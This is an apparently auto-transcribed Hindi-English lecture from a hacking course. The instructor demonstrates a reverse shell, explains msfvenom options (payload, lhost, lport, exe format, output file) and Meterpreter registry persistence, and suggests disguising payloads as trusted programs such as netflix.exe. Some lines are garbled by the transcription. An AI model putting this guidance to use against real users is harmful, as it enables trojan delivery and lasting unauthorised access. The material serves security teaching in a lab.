उसके कमांड प्रॉम्प्ट का एक्सेस मिल चुका है। अब मैं सारी कमांड यूज कर सकता हूँ। विंडोज में एलएस नहीं होता, विंडोज में dir होता है। आप देख सकते हैं कि मेरे विंडोज की जितनी भी फाइल्स हैं virus.exe ये अभी मेरे डाउनलोड्स फोल्डर के अंदर, प्रोग्राम्स फोल्डर के अंदर है। मैं इवन बैक जा सकता हूँ, cd लेट्स गो बैक, सॉरी dir, एंड आप देख सकते हैं Acunetix। देन यहाँ पे मैं dir करूंगा तो आप देख सकते हैं यहाँ पे एडवांस आईपी स्कैनर में इतने जितने भी मेरे चीजें हैं यहाँ पे। आप हुएमआई भी करके देख सकते हैं आप कौन से हैं, और आपको बता देगा अभी आपका यूजर है क्रॉप इजी, आप अभी एडमिनिस्ट्रेटर यूजर नहीं हो, तो उसके लिए आपको प्रिविलेज एस्केलेशन करनी पड़ेगी। अभी मेटर नहीं चल रहा तो मैं आपको बता नहीं सकता टेक्निक्स वगैरह के बारे में। आई डोंट नो व्हाई इट्स नॉट वर्किंग मेटर। एक और बार ट्राई कर लेते हैं। कह तो रहा है कमांड शेल ओपन। एक बार अपने क्या बोलते हैं काली लिंक्स में ट्राई करना, क्या पता मेरे रिसोर्सेज मिल नहीं रहा है इसको और इसलिए रन ना कर रहा हूँ, नहीं तो एक मेटर सेशन आ जाता है। कल तो काम कर रहा था। ओके इट्स नॉट वर्किंग। तो यहाँ ये सारे आपके मेथड्स मैंने आपको बता दिए हैं कि डिफरेंट डिफरेंट मेथड्स हैं, आप डिफरेंट डिफरेंट मेथड्स इन चीज के लिए यूज कर सकते हैं। आप देख सकते हैं मैं इसमें अपना डेस्कटॉप एक्सेस कर सकता हूँ, cd डेस्कटॉप, एंड अब मैं डेस्कटॉप वाली डायरेक्टरी में हूँ। अब मैं dir करूंगा तो आप देख सकते हैं जितना भी मेरे डेस्कटॉप में चीजें हैं वो सारी चीजें आ चुकी हैं यहाँ पे। नोट्स, मेटास्प्लॉइटेबल, लेक्चर 3, काली लिनक्स इंस्टॉलर, AMD ISO। अगर आपको यहाँ से भी देखना है तो आप देख सकते हैं ये सारी चीजें मेरे डेस्कटॉप पे हैं। तो ये पूरा जो भी आज हमने करा ये पूरा था आपका सिस्टम हैकिंग, गेन एक्सेस कैसे करते हैं। नेक्स्ट क्लास में मैं आपको बताऊंगा कि प्रिविलेज एस्केलेट कैसे करते हैं, अगर होपफुली मेटास्प्लॉइट मेरा चल जाए तो, नहीं तो मेरे को रीइंस्टॉल करना पड़ेगा आई थिंक। एक बार आप अपने में ट्राई करना कि मेटास्प्लॉइट वर्क कर रहा है या नहीं कर रहा। शेयर माय स्क्रीन बस। किसी को किसी चीज में डाउट था, क्योंकि ये थोड़े मैंने एक्स्ट्रा कमांड्स यूज करे हैं यहाँ पे तो थोड़ा बहुत कंफ्यूजन हो गया होगा बीच में, आप फिर से पूछ सकते हैं, बहुत टाइम है हमारे पास अभी। सर जब वो क्लिक करेगा तभी हमें मींस की एक्सेस हाँ मिलेगा? बिल्कुल, ये आपका एक वायरस बन चुका है, हमने एक वायरस क्रिएट किया है। अगर दोबारा से एक्सेस करना हो तो फिर से वो क्लिक करेगा तभी होगा? ना ना ना, उसके लिए हम परसिस्टेंस बनाते हैं। आपको वो फेज याद है जब गेनिंग एक्सेस के बाद एक मेंटेनिंग एक्सेस होता है। हाँ मेंटेनिंग जी। एक्सेस के फेज में हम क्या करते हैं कि यही चीज होता है कि लेट्स से कि शट डाउन कर दिया उसने कंप्यूटर अपना, ठीक है, फिर आके जब ऑन करता है तो हमारे पास एक्सेस तो रहेगा नहीं, तो उसके लिए हम परसिस्टेंस हाँ रन करते हैं। अभी मेरा मेटाप्रेटर शेल नहीं आया, नहीं तो उसके अंदर एक परसिस्टेंस, एक ही कमांड होती है रन परसिस्टेंस करके, आप एक बार ट्राई करना अपने में। तो ये क्या करता है, ये रजिस्ट्री में आपकी फाइल्स क्रिएट कर देता है और परसिस्टेंस बना देता है। तो आप जब भी शट डाउन करोगे या फिर वो उसको फिर बाद में क्लिक करने की जरूरत भी नहीं है, आप इवन वो फाइल भी डिलीट मार दो अपनी वायरस वाली, तब भी आपके पास वो एक्सेस ठीक रहेगा पूरा टाइम। है। ये अभी ओके जी। मेरे पास मेटाप्रेटर वाला शेल आ नहीं रहा है, मैं अभी चेक करता हूँ। कल आ रहा था, कल वर्क कर रहा था, बट आज पता नहीं क्या दिक्कत आ गई इसको। Sir, how will we get to know this MSF Venom and those codes that you written on that? How would you get to know? You can just do MSF Venom -h, sorry this is not, exit करते हैं इसको, MSF Venom -h and you will get to know all the options, कौन कौन से यूज कर सकते हैं। तो -p मैंने पेलोड के लिए यूज किया था। Yes, sir. But while creating payload, you used -o and those everything. So Yeah, -o you can see output file, and -f I've used for formatting। मैं दे रहा था उनको exe फाइल, लेट्स से कि exe फाइल क्रिएट करनी है। इफ मेरे को एक पाइथन फाइल क्रिएट करनी होती तो मैं क्या देता, -f py। अगर मेरे को कोई दूसरी फाइल क्रिएट करनी होती, लेट्स से मेरे को रूबी फाइल क्रिएट करनी है, मैं क्या देता, -f rb। बट जो बेसिक सिंटैक्स होता है, जो सबसे बेसिक सिंटैक्स होता है आपका, वो होता है आपका जो हमने अभी यूज किया है, -p विंडोज और लिनक्स, इट कुड बी लिनक्स और विंडोज। अगर आप मेटास्प्लॉइट के थ्रू लेना चाहते हैं एक्सेस तो मेटाप्रेटर, इफ नॉट यू कैन डू जस्ट सिंपल शेल अंडरस्कोर रिवर्स अंडरस्कोर TCP एंड देन lhost। फिर आपके आपके जिस सिस्टम से आप अटैक कर रहे हो उस सिस्टम की IP, lport
जो आप पोर्ट ओपन करना चाहते हो अपने सिस्टम के अंदर, इट कुड बी एनीथिंग. डोंट यूज द कॉमन पोर्ट्स. जो कॉमन पोर्ट्स होते हैं जैसे 22 पोर्ट हो गया. We हाँ need जी. to follow this example, right? Yeah, The you task need to is an follow this example. Okay, sir. Okay, got it. आप खुद क्रिएट करना, एक बार चेक करना वर्क करता है या नहीं करता. एंड एक बार मेटास्प्लोइटर वाला जरूर चेक करके मेरे को बताना. सो क्योंकि मेरे को अभी रीइंस्टॉल करना पड़ेगा ये पूरा मेटास्प्लोइट. कल भी वर्क कर रहा था, ये अभी पता नहीं कुछ प्रॉब्लम आ रहा है. Just a second. ओके, सो वी वर एट MS7. या मैं बता रहा था आपको कि बेसिक सिंटैक्स होता है MS7 का जो आपको फॉलो करना होता है, व्हिच इज lhost एंड देन lport. जो आपको lport मतलब पोर्ट प्रोवाइड करना है. देन -f फॉर फॉर्मेट, जो आपको फॉर्मेट रखना है. इट कुड बी exe फॉर विंडोज. एंड देन -o फॉर द आउटपुट फाइल, जो आपको आउटपुट प्रोवाइड करनी है, जैसे netflix.exe. और इट कुड बी एनीथिंग, इट कुड बी एनी सॉफ्टवेयर. लेट्स से कि आप कल मुझसे स्कैनर मांगते तो मैं जब स्कैनर के नाम पे आपको मैं acunetics.exe वाली फाइल प्रोवाइड करवा दूंगा. एंड आप तो रन करोगे तो आपको लगेगा तो ये नॉर्मल फाइल होगी, और रन करोगे तो और मेरे पास उसका एक्सेस आ जाएगा. एक काम करता हूँ, मैं ये वाली जो कमांड है ये नोट्स में लिख देता हूँ. एंड नोट्स को थोड़ा चेंज करना पड़ेगा इसमें. जो जितने भी मैंने कमांड यूज करी है आज, मैं सारी नोट्स में डाल देता हूँ. ऑलराइट, जैसे कि आप लोग इसको यूज कर पाओ. ओके, किसी को कोई डाउट किसी चीज में, पहले की चीज में किसी को कोई डाउट आ रहा हो तो. ये टास्क आप कंप्लीट करके ले आना कल. एंड उसके बाद मैं एक और टास्क दूंगा, एक और मशीन दूंगा आपको, उसको भी कंप्लीट करना है. बट वो मशीन में आपको प्रिविलेजेस क्लिक करनी पड़ेगी, तो वो सब चीज आपको करना पड़ेगा. सो आज के लिए तो टास्क बस इतना ही है कि ये वाली मशीन को आप क्रैक करके लेकर. राइट. एंड अब यहाँ की क्लास, आज की क्लास हम यही खत्म करते हैं. सो थैंक यू. Thank you, sir. Sir, can we leave the class?